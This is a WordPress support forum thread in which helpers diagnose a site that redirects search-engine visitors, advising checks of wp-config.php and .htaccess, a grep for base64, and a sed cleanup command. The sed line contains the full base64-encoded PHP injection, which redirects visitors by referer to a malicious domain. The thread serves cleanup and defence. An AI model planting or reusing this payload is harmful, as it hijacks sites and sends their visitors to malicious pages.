WordPress.org

Support

Support » How-To and Troubleshooting » Hacked… but only through Google?

Hacked… but only through Google?

Viewing 4 replies - 1 through 4 (of 4 total)
  • esmi

    @esmi

    Forum Moderator

    I had this same issue fortunately it was very easy to track down on my site. Check your wp-config.php file and look for a line that starts with “eval(base64_decode” – delete this code all the way to the semicolon at the end of the line. Assuming the hacker didn’t do additional damage, this should fix your issue.

    To prevent further issues I would make sure that you upgrade WordPress and all plugins and be sure to change all usernames and passwords.

    If you need any additional help, feel free to contact me.

    This hack could be caused by two things, Ken is correct that a base64 injection is one of them. A hack like this would cause the problem you are seeing, it may be in one or more files however.

    The other option which I think it would be is
    via a .htaccess modification, sending users coming from search engines to malicious domains.
    To fix this, you can simply look in the .htaccess file and remove the code. It seems more likely this is your culprit after scanning over your site.

    Best Regards,
    David G.
    http://www.dittodot.com

    It’s probably on more than one file, it’s probably on all php files in the directory. With shell access:

    cd /path/to/wordpress/install/
    grep -r base64 ./*

    If you see something like the following, then it’s redirecting:
    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm..."));

    This above is the shortened encoded code. The output of the code is actually:

    [Code moderated>]

    The site will respond normally if you hit it directly. If it comes from one of the referers (google, yahoo, myspace, facebook, etc) it’ll be redirected to the costabrava-dot-bee-dot-pl web site.

    Getting rid of the code:
    sed -i 's/eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw\/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));//g' ./*.php

    Be very careful with the above. Don’t adjust it if you are lost/uncertain. In which case, it may be easier to restore from backup.

    Afterwords, spend some time hardening the site with the links above. Especially checking extensions.

    HTH

    Thanks,

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Hacked… but only through Google?’ is closed to new replies.
Skip to toolbar